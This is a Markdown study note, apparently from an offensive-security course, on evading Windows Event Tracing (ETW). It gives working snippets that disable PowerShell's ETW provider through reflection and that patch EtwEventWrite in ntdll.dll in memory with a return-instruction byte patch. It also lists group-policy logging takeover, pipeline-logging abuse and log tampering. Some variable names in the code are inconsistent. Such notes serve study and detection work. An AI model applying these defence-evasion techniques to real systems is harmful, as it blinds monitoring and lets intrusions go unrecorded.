97 lines
2.4 KiB
Markdown
97 lines
2.4 KiB
Markdown
# Evade Event Tracing (ETW)
|
|
|
|
* Event Logging
|
|
* Trace Logging
|
|
* Event IDs are used
|
|
* __Event Provider__ generate events
|
|
* Managed Object Format, enabled by a single trace session
|
|
* Windows Software Trace Preprocessor, Trace Message Format, enabled by a single trace session
|
|
* Manifest Based, up to 8 trace sessions
|
|
* TraceLogging, up to 8 trace sessions
|
|
* __Event Controller__ build and configure sessions for events
|
|
* __Event Consumer__ interpret events, parses sessions of selected providers
|
|
* XML data
|
|
|
|
## Log Evasion
|
|
|
|
* Deleting logs is tracked by an event ID as well . Do not do it!
|
|
* ID 1102, security audit logs cleared
|
|
* ID 104, log file cleared
|
|
* ID 1100, even service shut down
|
|
|
|
### Techniques
|
|
|
|
* Provider
|
|
* [PSEtwLogProvider modification](https://docs.microsoft.com/en-us/dotnet/standard/assembly/) from .Net assembly
|
|
* Set `m_enabled` to `$null` via powershell script
|
|
|
|
```sh
|
|
$logProvider = [Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider')
|
|
$etwProvider = $logProvider.GetField('etwProvider','NonPublic,Static').GetValue($null)
|
|
[System.Diagnostics.Eventing.EventProvider].GetField('m_enabled','NonPublic,Instance').SetValue($etwProvider,0);
|
|
```
|
|
|
|
* Group policy takeover
|
|
* Loaded in the same security context as the user
|
|
* GPO providers are script block logging and module logging
|
|
* Event IDs reported are `4103` (Logs command invocation) and `4104` (Logs script block execution)
|
|
* Administrative Templates -> Windows Components -> Windows PowerShell
|
|
* Log pipeline abuse
|
|
* `LogPipelineExecutionDetails` has to be set to false
|
|
* Type creation
|
|
* Controller
|
|
* Patching EtwEventWrite stored in `ntdll.dll` via return value modification
|
|
|
|
```sh
|
|
var ntdll = Win32.LoadLibrary("ntdll.dll");
|
|
var etwFunction = Win32.GetProcAddress(ntdll, "EtwEventWrite");
|
|
```
|
|
|
|
* Modify memory permissions
|
|
|
|
```c
|
|
uint oldProtect;
|
|
Win32.VirtualProtect(
|
|
etwFunction,
|
|
(UIntPtr)patch.Length,
|
|
0x40,
|
|
out oldProtect
|
|
);
|
|
```
|
|
|
|
* Copy via `Marshal.Copy`
|
|
|
|
```c
|
|
patch(new byte[] { 0xc2, 0x14, 0x00 });
|
|
Marshal.Copy(
|
|
patch,
|
|
0,
|
|
etwEventSend,
|
|
patch.Length
|
|
);
|
|
```
|
|
|
|
* Clean up
|
|
|
|
```c
|
|
VirtualProtect(etwFunction, 4, oldProtect, &oldOldProtect);
|
|
```
|
|
|
|
* Check patched instruction
|
|
|
|
```c
|
|
Win32.FlushInstructionCache(
|
|
etwFunction,
|
|
NULL
|
|
);
|
|
```
|
|
|
|
* Runtime Trace Tampering
|
|
* Consumer
|
|
* Log smashing
|
|
* Log tampering
|
|
|
|
|
|
|
|
|